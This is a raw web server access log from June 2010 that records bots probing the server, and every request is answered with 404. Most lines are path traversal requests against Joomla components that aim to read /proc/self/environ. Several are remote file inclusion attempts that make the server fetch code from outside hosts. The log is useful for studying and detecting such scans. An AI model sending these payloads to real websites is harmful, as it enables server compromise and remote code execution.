219.240.36.36 - - [13/Jun/2010:06:49:48 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
66.71.188.11 - - [13/Jun/2010:06:49:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:49:53 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:49:53 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:06:50:51 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:06:50:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:06:50:56 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
188.72.70.56 - - [13/Jun/2010:06:51:44 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.71.188.11 - - [13/Jun/2010:06:51:50 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:51:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:51:51 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:52:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
219.240.36.36 - - [13/Jun/2010:06:52:26 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:52:27 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:52:27 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
66.71.188.11 - - [13/Jun/2010:06:53:06 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:53:06 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:53:08 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.123.133.162 - - [13/Jun/2010:06:54:56 -0500] "GET /logs/access_log.1274313600/home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.834"
174.123.133.162 - - [13/Jun/2010:06:54:56 -0500] "GET /home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.834"
174.123.133.162 - - [13/Jun/2010:06:54:56 -0500] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
69.64.91.113 - - [13/Jun/2010:06:55:01 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:55:05 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
94.23.197.156 - - [13/Jun/2010:06:55:09 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:06:55:09 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:55:10 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:55:10 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
74.204.169.23 - - [13/Jun/2010:06:55:14 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.204.169.23 - - [13/Jun/2010:06:55:14 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:06:55:21 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:06:55:21 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.197.156 - - [13/Jun/2010:06:55:21 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:06:55:22 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:55:27 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
173.160.141.237 - - [13/Jun/2010:06:55:31 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
173.160.141.237 - - [13/Jun/2010:06:55:31 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
178.63.27.83 - - [13/Jun/2010:06:55:41 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
122.252.7.141 - - [13/Jun/2010:06:55:53 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:06:55:53 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
178.63.27.83 - - [13/Jun/2010:06:55:56 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:06:56:09 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:12 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:06:56:16 -0500] "GET /logs/access_log.1272067200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0"
178.63.27.83 - - [13/Jun/2010:06:56:19 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:56:20 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:06:56:30 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:32 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:33 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:33 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:56:35 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:06:56:35 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:56:35 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:06:56:35 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:36 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:37 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:37 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:38 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:56:39 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:56:50 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
94.23.197.156 - - [13/Jun/2010:06:57:06 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:06:57:07 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:57:34 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:57:34 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
94.23.6.211 - - [13/Jun/2010:06:58:03 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:04 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:10 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:10 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:16 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:17 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:23 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:23 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:24 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:24 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:58:36 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:36 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:36 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:47 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:06:58:47 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
69.64.91.113 - - [13/Jun/2010:06:59:01 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:06:59:10 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
178.63.27.83 - - [13/Jun/2010:06:59:29 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:59:29 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:59:30 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.813"
69.64.91.113 - - [13/Jun/2010:07:00:15 -0500] "GET /logs/access_log.1274572800//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:00:15 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.828"
69.64.91.113 - - [13/Jun/2010:07:00:15 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.828"
59.42.10.71 - - [13/Jun/2010:07:00:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
62.44.82.118 - - [13/Jun/2010:07:00:57 -0500] "GET /logs/access_log.1274832000//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:00:58 -0500] "GET //////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:07:00:58 -0500] "GET /logs//////////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.803"
219.240.36.36 - - [13/Jun/2010:07:02:04 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
174.133.206.82 - - [13/Jun/2010:07:02:18 -0500] "GET /logs/access_log.1270771200//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.133.206.82 - - [13/Jun/2010:07:02:18 -0500] "GET //admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.133.206.82 - - [13/Jun/2010:07:02:18 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.oakbayunitedchurch.ca/site/components/idrose.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
188.72.70.56 - - [13/Jun/2010:07:02:40 -0500] "GET /logs/access_log.1273622400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [13/Jun/2010:07:02:40 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [13/Jun/2010:07:02:40 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
194.79.28.66 - - [13/Jun/2010:07:03:08 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
194.79.28.66 - - [13/Jun/2010:07:03:15 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
